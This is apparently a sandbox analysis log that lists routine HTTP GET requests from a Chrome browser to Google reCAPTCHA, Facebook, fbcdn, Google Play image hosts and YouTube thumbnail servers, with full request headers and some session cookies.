    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/clr?k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyr_PAn6oH3UE9sWtgk3tOu9JkbCdTkj6rf8SrgGfZ5k2EUxzHO7iCu6wIX8K22nf5MZ2d9pChSpLqpBwPg; NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /pages/create/?ref_type=registration_form HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yU/l/0,cross/ODVjh0Ni5D7.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y0/l/0,cross/ziNkdVTlV4m.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yI/l/0,cross/X9tSrDjPzyV.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yo/l/0,cross/b-9VvptAdOY.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yF/l/0,cross/0QTORSxRVO1.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yN/l/0,cross/S60_mKfvulW.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y0/l/0,cross/o2L07-KO0Bj.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y6/l/0,cross/WXyn0RO_iMz.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yx/l/0,cross/e3WW2lRt6d_.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yI/l/0,cross/TZbd1-PK_cx.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yO/l/0,cross/KuH9BoeRDxR.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /FVQXdzxDphpLdMRqIc5kG4C_Dc4AEO7-9uKHPt85v5_6Sp3J4mTV1S6P3ipLEoK6lDer=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /XRDaSYtkE4CmnsfdfgH7CGPmqCDJmeu-h1_J0qwXeHn5yu4NpZWyGRN60yDRYS_wVwg=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/y0Bm8EIP13g/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/pvJWQoLSWLo/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/3mkmZHd6xK8/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/a21q6qqmc1E/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /D4DUUFQDCsH9NIEa8hjMjQSWdtNhGX1Fd_jT-23ogAb5uMMqttqQDUJcUt4K_u8RYOQ=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ayEFwVZElGwAqSC4_lBrJNCJC7ayciaky2Qp7eOJqHHLjorWDgRsa_cKepjhc0d5xg=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npHAHmtZRgiMVEVg5pcncTIyqMW5MX--niR0L9PSzc5l8nuXS4GbU4w0yumQTururnc=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LByrur1mTmPeNr0ljI-uAUcct1rzmTve5Esau1SwoAzjBXQUby6uHIfHbF9TAT51mgHm=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/8TVDWzeRSQs/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/kq5HPV5XpIY/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ij9m4/yu/l/en_GB/GcN06huceZG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/y0Bm8EIP13g/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /FVQXdzxDphpLdMRqIc5kG4C_Dc4AEO7-9uKHPt85v5_6Sp3J4mTV1S6P3ipLEoK6lDer=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /XRDaSYtkE4CmnsfdfgH7CGPmqCDJmeu-h1_J0qwXeHn5yu4NpZWyGRN60yDRYS_wVwg=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
